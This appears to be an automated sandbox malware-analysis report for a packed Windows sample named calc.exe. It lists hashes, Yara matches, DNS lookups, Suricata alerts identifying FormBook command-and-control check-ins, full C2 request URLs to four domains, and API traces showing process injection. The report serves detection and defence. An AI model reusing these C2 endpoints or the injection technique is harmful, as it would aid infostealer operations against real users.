popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

calc.exe

UPX Malicious Library PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 26, 2023, 10:45 a.m. Jan. 26, 2023, 10:58 a.m.
Size 343.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 9e6edbb8f896b118663cfa8c0e2e8849
SHA256 48d4d0c2d682bbc507a63901694ca44bf3a6371895cc14f485eb9c110c8e4fb8
CRC32 A6AE78A9
ssdeep 6144:LYa6KGCw/94IiNF4K24QbDt3eUMs9nJyacdjtMiA1g2R8TCV60w3qDE6cgv1wx:LYsW/94xN121bBnf8tMbHHU0vDEevu
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
www.dailyhoroscope4you.space
CNAME dailyhoroscope4you.space
A 64.20.34.151
64.20.34.151
www.mybestfurend.com
CNAME shops.myshopify.com
A 23.227.38.74
23.227.38.74
www.precisionradiologyin.com
A 34.102.136.180
CNAME precisionradiologyin.com
34.102.136.180
www.moapulsa.com
A 162.0.232.224
CNAME moapulsa.com
162.0.232.224
IP Address Status Action
162.0.232.224 Active Moloch
164.124.101.2 Active Moloch
23.227.38.74 Active Moloch
34.102.136.180 Active Moloch
64.20.34.151 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49170 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 64.20.34.151:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 64.20.34.151:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 64.20.34.151:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 162.0.232.224:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 162.0.232.224:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 162.0.232.224:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.precisionradiologyin.com/nes8/?tXU4=6NRM34jc+vx38/mfPogWJwFe/HjyXK0Ji/xFefKXSMuFdvzjgtsT/eqi9nwNkBLUKkmM2y4J&UlSpj=GTgP1nY8x6nLDr
suspicious_features GET method with no useragent header suspicious_request GET http://www.moapulsa.com/nes8/?tXU4=py8vGRMZr9OTSTWstmwdIuRsGvWpk1bvMH9gd03rQ1QhqDUh/2V2C90NIaafZcqUrqdaT5G2&UlSpj=GTgP1nY8x6nLDr
suspicious_features GET method with no useragent header suspicious_request GET http://www.dailyhoroscope4you.space/nes8/?tXU4=3PKzed4jsIaTQKd+wFYKFs0yZsxnNY1mkdl0hGhoMN1fqOsvNJiiqt8SDs2DNBiTtt2/R1aE&UlSpj=GTgP1nY8x6nLDr
suspicious_features GET method with no useragent header suspicious_request GET http://www.mybestfurend.com/nes8/?tXU4=B88o+VQfd+uza1ucZPXDb4VegO964fw0oRUI8ak/LbvCN6sanJKzONrKEndi1iCjS7HG2HaV&UlSpj=GTgP1nY8x6nLDr
request GET http://www.precisionradiologyin.com/nes8/?tXU4=6NRM34jc+vx38/mfPogWJwFe/HjyXK0Ji/xFefKXSMuFdvzjgtsT/eqi9nwNkBLUKkmM2y4J&UlSpj=GTgP1nY8x6nLDr
request GET http://www.moapulsa.com/nes8/?tXU4=py8vGRMZr9OTSTWstmwdIuRsGvWpk1bvMH9gd03rQ1QhqDUh/2V2C90NIaafZcqUrqdaT5G2&UlSpj=GTgP1nY8x6nLDr
request GET http://www.dailyhoroscope4you.space/nes8/?tXU4=3PKzed4jsIaTQKd+wFYKFs0yZsxnNY1mkdl0hGhoMN1fqOsvNJiiqt8SDs2DNBiTtt2/R1aE&UlSpj=GTgP1nY8x6nLDr
request GET http://www.mybestfurend.com/nes8/?tXU4=B88o+VQfd+uza1ucZPXDb4VegO964fw0oRUI8ak/LbvCN6sanJKzONrKEndi1iCjS7HG2HaV&UlSpj=GTgP1nY8x6nLDr
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01cc0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01cd0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00850000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\njzrk.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 1704 called NtSetContextThread to modify thread in remote process 2136
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321456
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000a0
process_identifier: 2136
1 0 0